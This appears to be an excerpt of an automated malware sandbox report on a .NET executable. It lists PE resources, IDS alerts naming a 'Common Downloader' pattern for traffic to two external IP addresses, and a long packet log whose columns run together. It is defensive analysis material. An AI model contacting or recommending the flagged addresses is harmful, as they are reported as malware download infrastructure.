.reloc | 0x86000 | 0xc | 0x200 | e03241e1e8641c6363a0867e3fc393ae | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x162b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.6170212765957447
RT_ICON | 0x16718 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.4598360655737705
RT_ICON | 0x170a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.3818011257035647
RT_ICON | 0x18148 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.28226141078838174
RT_ICON | 0x1a6f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.22691308455361361
RT_ICON | 0x1e918 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.16452070632751734
RT_ICON | 0x27dc0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.12943629480657753
RT_ICON | 0x385e8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | | | 0.07427434387667545
RT_ICON | 0x7a610 | 0xa775 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | | | 0.970771419907159
RT_GROUP_ICON | 0x84d88 | 0x84 | data | | | 0.7045454545454546
RT_VERSION | 0x84e0c | 0x3d0 | data | | | 0.40061475409836067
RT_MANIFEST | 0x851dc | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T14:59:20.605221+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49712 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:23.433379+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49712 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:25.057130+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49724 | 172.67.177.134 | 443 | TCP
2024-11-25T14:59:26.280113+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49727 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:28.002851+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49732 | 172.67.177.134 | 443 | TCP
2024-11-25T14:59:31.118745+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49739 | 172.67.177.134 | 443 | TCP
2024-11-25T14:59:48.136512+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49789 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:50.308425+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49789 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:52.091612+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49798 | 172.67.177.134 | 443 | TCP
2024-11-25T14:59:53.464717+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49802 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:56.511566+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49814 | 193.122.130.0 | 80 | TCP
2024-11-25T14:59:59.495922+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49821 | 193.122.130.0 | 80 | TCP
2024-11-25T15:00:01.235169+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49824 | 172.67.177.134 | 443 | TCP
2024-11-25T15:00:12.752103+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49851 | 172.67.177.134 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Nov 25, 2024 14:59:04.953557014 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.953634024 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.953644991 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.966983080 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.967025995 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.967070103 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.967080116 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.967099905 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.967122078 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.981730938 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.981746912 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.981817007 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.981825113 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.981868982 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.999793053 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.999809027 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.999891996 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.999900103 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.999939919 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.073549986 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.073566914 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.073673964 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.073683023 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.073720932 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.084588051 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.084604025 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.084666014 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.084675074 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.084714890 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.096461058 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.096482038 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.096553087 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.096560001 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.096585989 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.096610069 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.106436014 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.106451988 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.106517076 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.106523991 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.106561899 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.117023945 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.117039919 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.117110014 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.117117882 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.117157936 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.127104044 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.127125978 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.127187014 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.127193928 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.127230883 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.127264023 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.133933067 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.133949995 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.134021044 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.134027958 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.134067059 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.140116930 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.140134096 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.140207052 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.140214920 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.140253067 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.265111923 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.265130997 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.265265942 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.265284061 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.265328884 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.270529985 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.270545006 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.270606995 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.270615101 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.270670891 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.276323080 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.276338100 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.276407957 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.276413918 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.276451111 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.282397032 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.282417059 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.282481909 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.282490969 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.282533884 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.287676096 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.287691116 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.287760973 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.287767887 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.287805080 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.293402910 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.293422937 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.293486118 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.293493986 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.293533087 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.299407005 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.299422026 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.299479961 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.299488068 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.299527884 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.305443048 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.305459976 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.305546045 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.305552959 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.305591106 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.469476938 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.469499111 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.469660997 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.469671965 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.469712973 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.474839926 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.474858046 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.474935055 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.474941969 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.474977016 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.480861902 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.480882883 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.480982065 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.480988979 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.481026888 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.486068010 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.486083984 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.486155033 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.486161947 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.486211061 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.492010117 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.492027044 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.492121935 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.492129087 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.492166042 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.497826099 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.497843027 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.498047113 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.498054028 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.498095989 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.503582001 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.503597975 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.503663063 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.503669977 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.503722906 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.509634018 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.509670973 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.509727955 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.509736061 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.509776115 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.661537886 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.661555052 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.661628962 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.661638975 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.661695957 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.666760921 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.666776896 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.666853905 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.666861057 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.666899920 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.672653913 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.672668934 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.672734022 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.672741890 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.672789097 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.678662062 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.678678036 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.678746939 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.678752899 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.678787947 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.684010029 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.684026003 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.684092045 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.684098005 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.684135914 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.689590931 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.689606905 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.689663887 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.689677000 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.689716101 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.695596933 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.695612907 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.695684910 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.695693016 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.695729971 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.701468945 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.701486111 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.701541901 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.701550007 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.701589108 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.853482008 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.853508949 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.853676081 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.853686094 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.853739023 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.859189987 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.859213114 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.859385967 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.859392881 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.859438896 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.864495039 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.864511967 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.864576101 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.864583969 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.864624023 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.870438099 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.870454073 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.870529890 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:05.870537996 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:05.870579958 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.885622025 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.885682106 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.891865969 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.891926050 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.899200916 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.899261951 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.902019024 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.902276993 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.906944036 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.907011032 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.909574986 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.909670115 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.915442944 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.915510893 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.919193983 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.919259071 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.924820900 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.924910069 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.930677891 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.930850983 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.933653116 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.933727980 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.939523935 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.939635992 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.945281982 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.945348024 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.948246956 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.948309898 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.951220036 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.951277971 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.957051992 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.957129955 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.971470118 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.971539974 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.976022959 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.976089954 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:33.978866100 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:33.978919983 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.052531958 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.052542925 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.052562952 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.052598000 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.052612066 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.052627087 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.067536116 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.067554951 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.067589998 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.067600012 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.067625046 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.080346107 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.080367088 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.080425024 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.080425024 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.080441952 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.094110966 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.094134092 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.094175100 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.094187975 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.094213009 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.102643013 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.102663040 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.102701902 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.102715015 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.102735043 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.109558105 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.109576941 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.109639883 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.109651089 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.117150068 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.117175102 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.117213964 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.117224932 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.117242098 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.123614073 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.123632908 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.123675108 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.123683929 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.123697042 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.167751074 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.198776960 CET44349752172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 14:59:34.198851109 CET44349752172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 14:59:34.198929071 CET49752443192.168.2.5172.67.177.134
